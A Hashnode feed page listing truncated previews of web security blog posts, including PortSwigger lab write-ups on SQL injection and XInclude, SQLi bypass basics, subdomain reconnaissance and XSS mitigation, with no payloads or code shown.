Arnab Dasdasarnab.hashnode.dev·Apr 18, 2024Comprehensive Guide to Web Security Best Practices: Preventing Common AttacksIntroduction In today's interconnected digital landscape, web security stands as a paramount concern for businesses, organizations, and individuals alike. The ever-evolving nature of cyber threats presents a constant challenge, making it imperative t...Discuss·10 likes#cybersecurity
Nabidul Islamnabidul.hashnode.dev·Apr 17, 2024Updating APIs with HTTP Methods & JSON PatchWhat are HTTP Methods HTTP (HyperText Transfer Protocol) methods are a set of requests that enable APIs (Application Programming Interfaces) to perform CRUD (Create, Read, Update, Delete) operations. Common HTTP Methods POST - The POST method is use...Discuss·1 like·29 readshttpmethods
Joel O.joelodey.hashnode.dev·Apr 16, 2024Lab: Exploiting XInclude to retrieve filesLab Scenario: Our mission is to exploit XInclude through a web application's "Check stock" feature. By intercepting and manipulating a POST request, we intend to use XInclude to retrieve files from the server. Let's proceed with the solution: Interc...DiscussPortSwigger XML external entity (XXE) injectionxxe
0xshinPro0xshin.hashnode.dev·Apr 14, 2024SQLi Series - Basic Bypassing Techniques - 021. Introduction Now that we have a basic understanding of how SQL statements work, let's dive into SQL injection. Before executing entire SQL queries, we will learn how to modify the original query by injecting the OR operator and using SQL comments ...DiscussCPTS Journey#sqlinjection
Jeremiah Liscummrliscum.com·Apr 10, 2024Subdomain Reconnaissance Made EasyThe information gathering phase of penetration testing is probably the most important part. This is where we build our understanding of the target, and get a general idea of how we may wish to attack. Subdomain reconnaissance is a critical skill to h...Discuss·33 readsWeb Development
Joel O.joelodey.hashnode.dev·Apr 8, 2024Lab: SQL injection attack, listing the database contents on non-Oracle databasesIn this educational guide, we will explore the practical application of Burp Suite to identify and exploit SQL injection vulnerabilities, highlighting the importance of robust security practices. Step 1: Intercepting and Modifying Requests with Burp ...DiscussPortSwigger SQL injection (SQLi) Labs#sqlinjection
Joel O.joelodey.hashnode.dev·Apr 1, 2024Lab: SQL injection UNION attack, retrieving data from other tablesIn this educational guide, we will walk through the process of using Burp Suite to intercept and modify requests, focusing on the product category filter. Our objective is to unveil potential SQL injection vulnerabilities, understand the database str...DiscussPortSwigger SQL injection (SQLi) LabsSQLi
Kshitij Kakadekshitijkakade.hashnode.dev·Apr 1, 2024Understanding and Mitigating XSS Attacks in Web ApplicationsCross-site scripting (XSS) is a menacing threat to web application security, allowing attackers to inject malicious scripts into websites, potentially leading to data theft, session hijacking, and unauthorized activities. This blog post delves into t...Discuss·1 likeFront-end Security
SANKALP HARITASHsankalp-haritash.hashnode.dev·Mar 29, 2024Enhancing Web Security: Understanding OAuth, OpenID Connect, SAML, JWT, and MFAAuthentication and Authorization are critical components of modern web security, ensuring that users are who they claim to be and that they have permission to access specific resources. OAuth, OpenID Connect, SAML, JWT, and Multi-factor Authenticatio...Discuss·10 likesSystem Design
Joel O.joelodey.hashnode.dev·Mar 25, 2024Lab: SQL injection attack, querying the database type and version on OracleTo exploit SQL injection, it's crucial to understand the structure of the database query. Use a payload to determine the number of columns returned by the query and identify columns containing text data. For instance, inject the following payload int...DiscussPortSwigger SQL injection (SQLi) Labs#sqlinjection